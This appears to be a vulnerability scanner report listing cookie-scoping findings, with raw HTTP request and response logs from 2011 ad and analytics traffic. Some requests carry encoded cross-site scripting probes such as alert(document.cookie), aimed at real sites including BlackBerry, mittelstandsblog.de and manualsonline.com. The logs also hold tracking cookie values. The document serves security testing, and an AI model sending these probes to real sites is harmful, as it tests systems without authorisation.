HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 70 Content-Type: image/gif Expires: -1 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: sgm=9583=734162&8278=734163&8069=734172&7596=734172&6159=734172&10272=734172; domain=.interclick.com; expires=Fri, 05-Feb-2021 21:50:15 GMT; path=/ X-Powered-By: ASP.NET P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI" Date: Sat, 05 Feb 2011 21:50:14 GMT
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /orbserv/hbpix?pixId=2725&tpd=CAESEH83n07tNVfjJL0v2PBkqF8&cver=1 HTTP/1.1 Host: idpix.media6degrees.com Proxy-Connection: keep-alive Referer: http://www.slackbooks.com/essentialknee Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ipinfo=2lfzx0l0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=015020a0e0f0g1lebnnsxzt11ucvexzt11txepxzt11txepxzt11ucve; adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; clid=2lebnns011706ch47d7o8wtv1ucve01010030608207; orblb=2lfk1rn0225810u020lxik0hlmv2dh10u0100000; rdrlst=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; sglst=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; vstcnt=3lebnns030r034nssk122m1boph1c4wn1bw2l1bw321bw2o1bw501bw3n1bw4o1bw3c1bw301bw5f1bw4e1bw381bw3l1bw2m1bw2c1bw351bw481bw2v1bw4h1bw4x1bw4b1bw361bw3z1bw4f1bw4w1bw4g1bw331bw431bw2q1bw4z1bw2b1bw441bw2r1bw5e1bw3f1bw521bw3p1bw5a1bw311bw4r1bw5d1bw5j1bw421bw2p1bw3x1bw5g1bw2i1bw4a1bw3b1bw531bw4p1bw3q1bw541bw3r1bw4q1bw4j1bw461bw2t1bw3m1bw4y1bw4s1bw2z1bw4c1bw2k1bw3v1bw4i1bw4t1bw3a1bw451bw2s1bw2j1bw4n1bw3e1bw591bw3w1bw401bw2n1bw3u1bw341bw4u1bw3k1bw491bw2w1bw5b1bw561bw3t1bw511bw551bw3s1bw471bw2u1bw5i1bw4l3ik5120o0keqa0pk2n0kh4a0kh3u0kh490kh3s0kh3t0kh3m0kh3a0kh3y0kh3j0kh3h0kh390kh3x0kh3v0kh4b0kh3d0kh3f0kh3r0kh3l0kh430kh3g0kh3p0kh3z4jaec12011ucve1l034e206123s181qq1845a1847x1845b1847u1847e1847k1847y1843w1844k184621845j1844p184551843s1847h1846q1844z184871846u184571843u18486184741846t1846l1845r1842z185k81848f1844n1844d184781846a1845v1846j1846k184801845s1843g1847a1843d184841846r1845y1844l1847i1847r1847p184541843r1845i1844y1844r1842x184811846o1844u1844s1847b1843k1843n1848a1845q1845n1845c1842t1844j1845e1845g184821846p184301847f1844c1847t1843c1843j1848b1847z1842u1843p184851846s1845f1845h18435184371846b1843o1845m1847s1848g
...[SNIP]...
Response
HTTP/1.1 302 Moved Temporarily Server: Apache-Coyote/1.1 P3P: CP="COM NAV INT STA NID OUR IND NOI" Pragma: no-cache Cache-Control: no-cache Set-Cookie: adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; Domain=media6degrees.com; Expires=Thu, 04-Aug-2011 22:35:31 GMT; Path=/ Set-Cookie: clid=2lebnns011706ch47d7o8wtv1udrf01110040609208; Domain=media6degrees.com; Expires=Thu, 04-Aug-2011 22:35:31 GMT; Path=/ Set-Cookie: orblb=2lfk1rn0225810u020lxik0hlmv2dh10u0100000; Domain=media6degrees.com; Expires=Thu, 04-Aug-2011 22:35:31 GMT; Path=/ Set-Cookie: rdrlst=4150o2ylebnns00000011100407dpletz4d0000000x100410e5lg1nei0000000710040mmnlebnns00000011100410rdlg1vir0000000610040x1blebnns0000001110040xo1lebnns0000001110040eh5lf17qf0000000t100406bylemlne0000000z10040w3clebnns00000011100407gmlebnns0000001110040jv6lebnns0000001110040j4ilew2e20000000v10040xthlebnns0000001110040fullf8gij0000000p100410f6lg1nei0000000710041196lfzx0l00000008100400c9lfk1rn0000000m10040jillebnns0000001110041194lg3y5y0000000510040fuqlegh2b0000001010040b6mlf17qk0000000s10040mz1lebnns0000001110040cajlfk1rn0000000m10040p7vlebnns00000011100407vglfk1rn0000000m10040xvslebnns0000001110041192lg5l2h00000004100410ellg1nei0000000710040xuklebnns0000001110040jk7lebnns0000001110040x1jlebnns0000001110040yiplebnns0000001110040cbnlfk1rn0000000m10040xwflebnns0000001110040yh0lebnns00000011100410telg60j60000000210020e4vlebnns00000011100410e9lg1nei0000000710040xwblebnns0000001110040jwblfk1rn0000000m1004; Domain=media6degrees.com; Expires=Thu, 04-Aug-2011 22:35:31 GMT; Path=/ Set-Cookie: sglst=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; Domain=media6degrees.com; Expires=Thu, 04-Aug-2011 22:35:31 GMT; Path=/ Location: http://www.googleadservices.com/pagead/conversion/1030881291/?label=Ad-QCIPSuQEQi4DI6wM&guid=ON&script=0 Content-Length: 0 Date: Sat, 05 Feb 2011 22:35:30 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /adcedge/lb?site=695501&srvc=1&betr=39060_NDM_cs=tagvalue&betq=11311=420919 HTTP/1.1 Host: leadback.advertising.com Proxy-Connection: keep-alive Referer: http://www.owneriq.com/ownership-targeting?src=728x90_blue Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ACID=Bc330012940999670074; aceRTB=rm=Sun, 06 Mar 2011 19:31:17 GMT|am=Sun, 06 Mar 2011 19:31:17 GMT|dc=Sun, 06 Mar 2011 19:31:17 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; GUID=MTI5NjkxNzUyNjsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; C2=2dWTNJpwIg02FWDCdbdh1gwUwXYNI8Y4FWDCYTeh1gQ3gZYNIQTnGWDCF2ph1gAohXYNIYZ4FWDCKGeh1gwohXYNIca4FWDCiGeh1gQshXYNRC5BkDdxcL7YAwAoGO3r1JQcKaYWGKWAI9YBTO53CkL3Fp1gPPw6TVkfsuGB/0mxLda7FIaWGjSrMWw41ZgNkqVB6bjx1q6bBwWZGO9r4bQsMaMUwanBW8oxQ1I9GsfzFJ1sNaQQoaUds2jB1xmBI7KzHUyhGJup4jgaVZ4bySHAlBqhp4KVIYGgG+Ws+AA8UaYKyOHAhBqhpI7dAEHoGmF; F1=Bg5ZN1EBAAAABAAAAQAAgEA; BASE=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!; ROLL=v5Q2Q0MzE2zqVBGrCMc3X5z2fuIiXWOzT9fCbWM!
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 22:31:19 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV Set-Cookie: C2=3+cTNJpwIg02F9BCdbdRfgwUwX0HI8Y4F9BCYTeRfgQ3gZ0HIQTnG9BCF2pRfgAohX0HIYZ4F9BCKGeRfgwohX0HIca4F9BCiGeRfgQshX0HRC5BkDdhGL7YAwAoG11r1JQcKa0QGKWAI9Yx8N53CkL3FQ0gPPw6TVAasuGB/0mh1ca7FIaWGKRrMWw41Z8HkqVB6bjhfq6bBwWZG17r4bQsMaoOwanBW8oh60I9GsfzFwzsNaQQoawXs2jB1xmxx6KzHUyhGwsp4jgaVZUWySHAlBqRT4KVIYGgGlVs+AA8Ua0EyOHAhBqRTI7dAEHoGNErvgwNsZAc; domain=advertising.com; expires=Mon, 04-Feb-2013 22:31:19 GMT; path=/ Set-Cookie: GUID=MTI5Njk0NTA3OTsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; domain=advertising.com; expires=Mon, 04-Feb-2013 22:31:19 GMT; path=/ Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ Cache-Control: private, max-age=3600 Expires: Sat, 05 Feb 2011 23:31:19 GMT Content-Type: image/gif Content-Length: 49
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /load/?p=104&g=160&j=j HTTP/1.1 Host: load.exelator.com Proxy-Connection: keep-alive Referer: http://c03.adsummos.net/a/e/s21719 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: EVX=eJyNyjsOgCAQRdG9sIL5ZuCxmAkltaVh76KWNuZWNzkDinNCqmu0PsD3UT%252FAFYWtekaKeRJx7kpfE0oS4T9xkyDnL24P1hdb6sbrAgq5JDk%253D; BFF=eJztlM1OwzAQhN8lT%252BCfOI6dS1MqRKQmQOpWcEI9cuYIvDtrN0nX7lqiqEeu30zGSbw7R1ty%252B%252FlhObOF46zsV8YYUTTvlpe1bkCQtugfB%252FewfX07dLvOFc3Rqir3TGXgGTVxhCKvRILxXDMUoRXg8oQR8Qnt2q1EraQ20xt6QQaOwOyUTGitEqEbDmQEcMJJRoz9CxkBnHBy%252BF4tCIHMvtv2ZDZwwklGtBsiWwaOnWK%252BkOg4HUlRjEbX6PCY1OcrdwjNMcmVxVJ0Qo1O2GdO2Oe8Egtg3glWwid%252FMe7ValLnWTyrWBCLkD6jFwVBmN1Nuw0jXZ6wmWbXY0S88XlwlBFwYuyGe8oIGJF5xo3QTPE4IWwJE0zFOIxWguc5p2LCphB%252BP7uUP6xF3i95lROSF%252FW%252Fnwpqn4bLg2XgSQAYyYAN%252Febterzwh1YZcQBfFiayftPlplW%252B3LJVdn1zXV9UVC9FV%252FL7Xrq%252Bhm7cOjeumL%252F2Sb42Mg2R6YPM9v%252Fv%252Bm1XO7vJP5xXI9Y%253D; xltl=eJxLtDKyqi62MrZSCvV0UbIGsoyslEwSE02STSwtzRPNU03MkiwsktMMUpItzCzSkgwtTFMNwOqslHyCnJWsM60MTSzNDUwtjK1rASUdFEc%253D; myPAL=eJylkstOwzAQRf%252Bl3noxM36M7a4CEVIlEkEJqFuWXbME%252Fp0Zu2laVBUEq7zOPXbu%252BLVgLO%252F7Auu3QlxW6GM2OWc0CN5ABDPJzSBvaLXeF1QsKsbhgDEYABSMYaboKDtSl2ROMF9lKRhKwXG2DoglRD5Ua3cz2c34YrfDzt7eD7brd5r0xwUSX1kgLFg6wVLDphmLgmE6xQjA%252BBSNfuWLEoQmeZ4lSbEmmQtkJ%252F9A5onAy74%252FAJXLwsWqy7UbbzMxBLQEBEEfHMZ2kRpcq6Hv5N%252F7x3Gy%252FWa8s9qKtFEHooOL8U8%252BVc3lHopF%252FJ%252BuexhVJTvcVp2eBI%252FfdNcMNVUPhltSeJ5qezkfec3psXDpp5wONyDV4WJYIvybyOcXUsKxDg%253D%253D; 
...[SNIP]...
Response
HTTP/1.1 200 OK Connection: close X-Powered-By: PHP/5.2.8 P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA Content-Type: application/json Set-Cookie: xltl=eJxLtDKyqi62MrZSCvV0UbIGsoyslEwSE02STSwtzRPNU03MkiwsktMMUpItzCzSkgwtTFMNwOqslHyCnJWsM60MTSzNDQ1MTK1rASUAFEE%253D; expires=Sun, 05-Jun-2011 22:25:32 GMT; path=/; domain=.exelator.com Set-Cookie: myPAL=eJylkstOw0AMRf%252Bls52F7Xl4Jl0FIqRKJIISULcsu2YJ%252FDv2TB4tqgqCVV7nnnhsvzbIzfuxge1bQ9xs0Mdscs5oELyBCGaUm17e0GZ7bFCxqBiHCWMwACgYw0zRIluoSzInmC%252ByFAyl4DhbB8QSIh%252BKtb0Z7W54sfv%252BYG%252Fve9t2B0365QeJr%252FwgrFg6wVLFxhmLgmE6xQjA%252BBSNfuWLEoQqeZ4lSbEqmRvITs5A5onAS90fgMpl4WLR5dIbbzMxBLQEBEEfHMZ6kTa42oaulbN3j8Nou91wZ7Ur0o0yEB1cjH%252FyqWpu7tRYxP%252Fp2odBVVLhvuh0Ezx%252B010zlFRZDLem8DxVazkfecnpWrj0U06HG5DKcDGsEf5lJK7VXYmUJZmqk1N9fgFco7yt; expires=Wed, 06-Apr-2011 22:25:32 GMT; path=/; domain=.exelator.com Set-Cookie: BFF=eJztlM1OwzAQhN8lT%252BCfOI7dS1OqikhNgNat4IR65MwR%252Bu6s3SRdu2uJoB65fjMeO%252FF6TrYU9uvTcmYLx1nZLY0xolh8WF7WegGCtEX31LvH7dv7sd23rlicrKpzayoDa9TAEYq8EgnGc81QhFaAywtGxCc0K7cUtZLaDCf0ggwcgdEpmdBaJULbH8kI4ISTjNh1r2QEcMLJ4Xu1IAQy%252B2HbkdnACScZ0ayJbBk4dorxQqLtdCRFMRpdo8NjUl%252Bv3CE0xiRXFkvRDjXa4ZDZ4ZDzSiyAeS9YCZ%252F8zbhXq0EdZ%252FGqYkFMQrpGTwqCMLvrZhtGurxgM8yux4h440vvKCPgxNj2G8oIGJFxxo3QTPE4IbwSJpiKcRitBI9zTsWEl0L4%252FexS%252FvAs8n7Jq5yQHNT%252Ffiqoee5vN5aBJwFgJAPW9Mmb1e7GH1plhwP49GDS6EHZRIq%252BzuxmQme6CbXKN2G29%252BbX3PxWo0osur%252Ffl9j8zrpzRd25j%252F5aPvmOydRJpjwyVfFfDPftgfnP%252FvwDMTU0HA%253D%253D; expires=Sun, 05-Jun-2011 22:25:32 GMT; path=/; domain=.exelator.com Set-Cookie: 
TFF=eJydlktywyAMhu%252BSE0gILCAbH6PbLLLoTHftLpO7lyQ2uBI4chceGOb%252F0MOS7EsOkG%252FfGV0%252BIfgZJphTSu50vmSXb58Zz%252BXxKZQFntspne9Kjw89Cb0rj%252BS4YjairOCFkhdl1HdfP65fl5%252BrvHslCHthMMwA2AubmzNlq%252FUybF6DQMFxxWxEWRmMdz98cj6MYogthvjS%252B6Z3MRAn4VPUljSJKRG7%252F5AEjjlYSa6gjShnPli9Wos4dos%252BtgIrW61XHkVtJ26LPsqiHxLPdwow%252BzjtW3La1MIZkXIIMGgXnAYJQDiWsEV%252FNGEFO5IwZCp14rqepaZPHb3yLGk7dX69MBvxaGQy3v1sEtpprzojfSVTGwFUR4A3cxuLyTGE4RwnSVIjHTiQ%252FTwG%252F5oklIVqdZZwaFOSXEEbUc4oHPCqfgh348F35DAeRVIjd5OvwGWsBOxWfW38bupXrhukmVS%252BDklqZDfIEciVM5tax9Tg54ebnjv6YRpRcn7D7abxLTnMhiKpkbtplCBXzkbcfwGeWpTs; expires=Sun, 05-Jun-2011 22:25:32 GMT; path=/; domain=.exelator.com Date: Sat, 05 Feb 2011 22:25:32 GMT Server: HTTP server Content-Length: 18
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /orbserv/hbpix?pixId=2869&curl=http%3A%2F%2Fwww.slackbooks.com%2Fessentialknee HTTP/1.1 Host: map.media6degrees.com Proxy-Connection: keep-alive Referer: http://www.slackbooks.com/essentialknee Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ipinfo=2lfzx0l0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=015020a0e0f0g1lebnnsxzt11o9ctxzt11txepxzt11txepxzt11o9ct; vstcnt=3lebnns031l034e206123s181qq1845a1847x1845b1847u1847e1847k1847y1843w1844k184621845j1844p184551843s1847h1846q1844z184871846u184571843u18486184741846t1846l1845r1842z185k81848f1844n1844d184781846a1845v1846j1846k184801845s1843g1847a1843d184841846r1845y1844l1847i1847r1847p184541843r1845i1844y1844r1842x184811846o1844u1844s1847b1843k1843n1848a1845q1845n1845c1842t1844j1845e1845g184821846p184301847f1844c1847t1843c1843j1848b1847z1842u1843p184851846s1845f1845h18435184371846b1843o1845m1847s1848g1844g184561843t1847c1847g1843f1844a1847v1843m1844m184721845p1848e1844q1848c1843h1842y1847d1848d1844t1845x1847q1845k184711845o1846i1844f184791845w1845d184581844h1843v1847o18434184691845t184531844w1844e184881846v1844v4fhux122u000000axzm000000d1t30d1rq0d1qh0d1te000000d1ss0d1px0d1s00d1t20d1sn0d1rp0d1rb0d1t40d1rr0d1s70d1qu0d1q60d1ps0d1r70d1pu0d1rf0d1r10d1r40d1qx0d1ql0d1pr0d1r60d1sm0d1r90d1pw0d1qw0d1qc0d1sr0d1qz0d1sq0d1se0d1rm0d1qj0d1rg0d1t90d1rw0d1pl0d1qe0d1q50d1rc0d1q20d1so0d1t00d1ro0d1su0d1sd0d1qa0d1tb0d1qv0d1s10d1qo0d1r00d1s40d1qi0d1t80d1tf0d1st0d1py0d1rh0d1rd0d1sz0d1qm0d1q40d1q10d1r80d1pv0d1rk0d1s20d1sk0d1tc0d1rj0d1qb0d1pm0d1r20d1sc0d1rl0d1qg0d1ta0d1rt0d1t50d1rs0d1r30d1pq0d1si0d1t70d1sj0d1ru000000000000000000000000000000000004esx7120104tej0r023ik5120o0keqa0pk2n0kh4a0kh3u0kh490kh3s0kh3t0kh3m0kh3a0kh3y0kh3j0kh3h0kh390kh3x0kh3v0kh4b0kh3d0kh3f0kh3r0kh3l0kh430kh3g0kh3p0kh3z4nssk122m1boph1c4wn1bw2
...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: messenger.yahoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:58:22 GMT Set-Cookie: B=cavfg3t6krlge&b=3&s=da; expires=Tue, 05-Feb-2013 20:00:00 GMT; path=/; domain=.yahoo.com P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Cache-Control: private Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 20576
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <title>Yahoo! Messenger - Chat, Instant message, SMS, Video Call, PC Calls</title> <meta http ...[SNIP]...
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
s_vi=[CS]v1|26A75175051D128B-40000130C01FD049[CE]; Expires=Fri, 5 Feb 2016 13:32:26 GMT; Domain=.blackberry.com; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/rimglobal,rimbbus/1/H.22.1/s28855670725461?AQB=1&ndh=1&t=6%2F1%2F2011%207%3A33%3A2%200%20360&ns=researchinmotion&pageName=us%3Abb%3Adevices%3A94178%2522%253E%253Cscript%253Ealert(document.cookie)%253C%3Ascript%253Ed0d62204af5%3A404%20Error%20-%20Page%20not%20found&g=http%3A%2F%2Fus.blackberry.com%2Fsmartphones%2F94178%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ed0d62204af5%2F&r=http%3A%2F%2Fburp%2Fshow%2F47&vvp=DFA%231516044%3Av32%3D%5B%5B%22DFA-%22%2Blis%2B%22-%22%2Blip%2B%22-%22%2Blastimp%2B%22-%22%2Blastimptime%2B%22-%22%2Blcs%2B%22-%22%2Blcp%2B%22-%22%2Blastclk%2B%22-%22%2Blastclktime%5D%5D&ch=us%3Abb%3Adevices&events=event8&c1=us%3Abb%3Adevices%3A94178%2522%253E%253Cscript%253Ealert(document.cookie)%253C&h1=us%2Cbb%2Cdevices%2C94178%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Cscript%253Ed0d62204af5&v9=us%3Abb%3Adevices%3A94178%2522%253E%253Cscript%253Ealert(document.cookie)%253C%3Ascript%253Ed0d62204af5%3A404%20Error%20-%20Page%20not%20found&v10=us%3Abb%3Adevices&v23=us%3Abb%3Adevices%3A94178%2522%253E%253Cscript%253Ealert(document.cookie)%253C&c40=http%3A%2F%2Fus.blackberry.com%2Fsmartphones%2F94178%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ed0d62204af5%2F&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1001&bh=1031&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava(TM)%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1 Host: metrics.blackberry.com Proxy-Connection: keep-alive Referer: http://us.blackberry.com/smartphones/94178%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed0d62204af5/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BLLY=CT; fsr.a=1296999181981; s_cc=true; dfa_cookie=rimglobal%2Crimbbus
Response
HTTP/1.1 302 Found Date: Sun, 06 Feb 2011 13:32:26 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi=[CS]v1|26A75175051D128B-40000130C01FD049[CE]; Expires=Fri, 5 Feb 2016 13:32:26 GMT; Domain=.blackberry.com; Path=/ Location: http://metrics.blackberry.com/b/ss/rimglobal,rimbbus/1/H.22.1/s28855670725461?AQB=1&pccr=true&vidn=26A75175051D128B-40000130C01FD049&&ndh=1&t=6%2F1%2F2011%207%3A33%3A2%200%20360&ns=researchinmotion&pageName=us%3Abb%3Adevices%3A94178%2522%253E%253Cscript%253Ealert(document.cookie)%253C%3Ascript%253Ed0d62204af5%3A404%20Error%20-%20Page%20not%20found&g=http%3A%2F%2Fus.blackberry.com%2Fsmartphones%2F94178%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ed0d62204af5%2F&r=http%3A%2F%2Fburp%2Fshow%2F47&vvp=DFA%231516044%3Av32%3D%5B%5B%22DFA-%22%2Blis%2B%22-%22%2Blip%2B%22-%22%2Blastimp%2B%22-%22%2Blastimptime%2B%22-%22%2Blcs%2B%22-%22%2Blcp%2B%22-%22%2Blastclk%2B%22-%22%2Blastclktime%5D%5D&ch=us%3Abb%3Adevices&events=event8&c1=us%3Abb%3Adevices%3A94178%2522%253E%253Cscript%253Ealert(document.cookie)%253C&h1=us%2Cbb%2Cdevices%2C94178%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Cscript%253Ed0d62204af5&v9=us%3Abb%3Adevices%3A94178%2522%253E%253Cscript%253Ealert(document.cookie)%253C%3Ascript%253Ed0d62204af5%3A404%20Error%20-%20Page%20not%20found&v10=us%3Abb%3Adevices&v23=us%3Abb%3Adevices%3A94178%2522%253E%253Cscript%253Ealert(document.cookie)%253C&c40=http%3A%2F%2Fus.blackberry.com%2Fsmartphones%2F94178%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ed0d62204af5%2F&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1001&bh=1031&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava(TM)%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 X-C: ms-4.3.1 Expires: Sat, 05 Feb 2011 13:32:26 GMT Last-Modified: Mon, 07 Feb 2011 13:32:26 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www334 Content-Length: 0 Content-Type: text/plain
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /intellitxt/front.asp?ipid=12476 HTTP/1.1 Host: mittelstandsblog.de.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(1)%3C/script%3E02e0a7e96b=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX="AQAAAAwAAArrAQAAAAMAAAEt98vDoAAAAS332v9sAAABLffbZhUAAArYAQAAAAIAAAEt99r/bAAAAS3322YVAAAK6gEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAKywEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6QEAAAACAAABLffa/2wAAAEt99tmFQAACugBAAAAAQAAAS33y8OgAAAPpgEAAAACAAABLffa/2wAAAEt99tmFQAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAnwCngQ--"; VM_USR="AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wgAAAEt+/NP3wA-"
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Set-Cookie: VM_USR="AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wkAAAEt+/O1yQA-"; Version=1; Domain=.intellitxt.com; Max-Age=5184000; Expires=Thu, 07-Apr-2011 17:10:09 GMT; Path=/ Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Set-Cookie: VM_USR="AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wkAAAEt+/O1yQA-"; Version=1; Domain=.intellitxt.com; Max-Age=5184000; Expires=Thu, 07-Apr-2011 17:10:09 GMT; Path=/ Content-Type: application/x-javascript Vary: Accept-Encoding Date: Sun, 06 Feb 2011 17:10:08 GMT Connection: close Content-Length: 10810
document.itxtDisabled=1; function itxtokeydoke(){try{var b=document.getElementByTagName('BODY')[0];if(document.all){if(b.innerText.indexOf('Cx26A')>=0)return 1;}else{if(b.textContent.indexOf('Cx26A')> ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /minimall?w=450&h=auto&client=OwnerIQ&sid=Chitika%20Default&url=http%3A//homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281/d/type/product_problem&ref=http%3A//burp/show/1&nump=3&type=mpu&cl_border=%23FFFFFF&cl_bg=%23FFFFFF&cl_title=%230068B3&cl_text=333333&cl_site_link=%230068B3&screenres=1920x1200&winsize=995x1094&canvas=969x225&frm=false&history=2&cb=428&loc=205,1872&output=simplejs&callback=ch_ad_render_search HTTP/1.1 Host: mm.chitika.net Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
